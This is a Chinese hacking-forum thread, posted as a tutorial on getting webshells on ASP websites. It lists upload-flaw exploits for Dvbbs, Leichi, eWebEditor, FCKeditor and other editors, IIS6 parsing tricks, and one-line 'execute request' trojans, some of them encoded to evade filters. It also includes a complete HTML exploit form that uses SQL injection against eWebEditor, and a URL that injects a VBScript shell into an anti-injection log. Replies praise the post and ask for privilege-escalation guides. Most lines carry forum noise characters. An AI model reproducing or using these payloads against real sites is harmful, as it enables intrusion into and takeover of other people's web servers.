返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
/ c. Z' {7 ~9 _+ J* j, a
# u. c3 ^* o6 T( c0 ?- Z4 o  e2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
3 Z* A% w7 p+ X
' ]& [# d& u7 r9 E. c/ t/ F3.上传漏洞:
0 T, E6 ^6 d7 Q1 J" p* r! P5 ?
9 Z/ |8 z9 v% o1 M: K动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
% p2 {* n4 h. p& S: @: F; X7 k1 B0 V- T9 _
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件; ]+ h: ?3 l" H* y

& ~; d' d) @" N' W# Y  V雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp2 C& w4 I2 J; r% ~% u1 ]
然后在上传文件里面填要传的图片格式的ASP木马
4 j" A' K5 N* _2 \  d2 \就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
  u8 P2 \' }  q5 ?9 o4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传& o2 M4 P: k; q( W" o% ~
: z- n; k  g5 e+ K  C
<html>+ D+ F4 p8 u" Q% Q1 X, [2 _6 }
<head>9 c. g/ V$ x3 B) F
<title>ewebeditor upload.asp上传利用</title>
7 k- k9 w  `" }& u" J</head>" }/ y2 p; ?7 H9 Y
<body>
/ ?% i1 h0 g( y; J7 y<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
* ^- [( Q* I9 e- z<input type=file name=uploadfile size=100><br><br>
& E7 E! k# f: P$ ~<input type=submit value=Fuck>5 [) h4 M, ~( v$ t1 a7 v$ z9 a
</form>
: I- S* @) o: \, ^* i' @</body>; Z6 W; i/ m1 K! H7 B
</form>
8 y6 W7 O7 ]% N& h" c4 b& p3 i/ m</html>
6 g2 t& b- a  Q1 ~- S+ Q2 t! N. x# K
) ?. ]$ n6 \7 }. P+ \6 r: _2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问  X# x; q3 ^7 G, p
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp/ X+ k, r6 j# H6 G5 ]# D! U2 ?
3 |' c$ o+ H2 L) o, j& b6 ^
利用windows2003解析。建立zjq.asp的文件夹" c- ?) b" }9 Q8 x' p( E) D* E# B
: C5 s: S( w; j2 I
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
. P; z/ E! u! B8 \
& ]* H) |/ F5 @9 k5 D7.cuteeditor:类似ewebeditor
3 `5 ~6 S  `  C. {( o! S1 R3 ^. a7 K2 Q% O) B
8.htmleditor:同上
1 l+ ?5 Y  R' E1 U  H
# c+ n  @' |/ U2 a- h9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破$ H& q* I; ?- x3 ?( e
+ d, B( i' c' U7 F) G7 k0 z
<%execute request("value")%><%'<% loop <%:%>
* y5 U1 Q: g" i" ?5 B" T
  l$ W. H% E* @<%'<% loop <%:%><%execute request("value")%>( P' A: P6 V- d& n$ J
3 r8 i& t# r8 x9 |$ n: G/ v
<%execute request("value")'<% loop <%:%>5 K# k; V2 C, j3 {" B; ^
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
- q! T) o; ^, Y  B
) d/ \+ b) o+ K10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
* f! O: f' l- Z8 e6 ^' o, G- P4 u+ a0 _/ W" i: Z: S
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
) H0 y# @1 ^- s  R% ?4 [/ f7 M! }, u1 Z! D/ z8 b+ {2 s" H0 y1 ?
解析漏洞得到webshell
% C0 b; K% c' M4 K6 w; Y  ~) A# q# G: ^& y4 C" x: y
12.mssql差异备份,日志备份,前提需知道web路径, P% p8 ?4 n% j5 ^9 A
6 {+ g* k, |$ r4 p1 H
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
$ q2 ?# q5 R, R; [2 }8 L" o+ I  i" l2 }8 @
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
2 T( X$ [4 v  g( A3 B4 [/ A
7 c; U  g5 x9 t6 }$ w& O15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可% y- i1 D- |; a8 d6 l% @; ?. C, K
: n" E( ?" p: ?& u( ~0 K, [
以上只是本人的一些拙见,并不完善,以后想到了再继续添加0 c5 h' p, a) P9 {# f# l
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 - ?& Y# a+ r7 P9 @! {$ p6 [

3 n; f' [) e# p% \. N4 F- R! v
很好啊、基本的入侵方法都包含了+ o5 c6 C! J# r6 F
- B, |3 M( K3 [- w/ J; \
最好来个提权的帖子再。7 p1 r" `) k9 Z$ {6 [
' i6 u( v- d1 N% M5 }3 ?1 U9 F
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表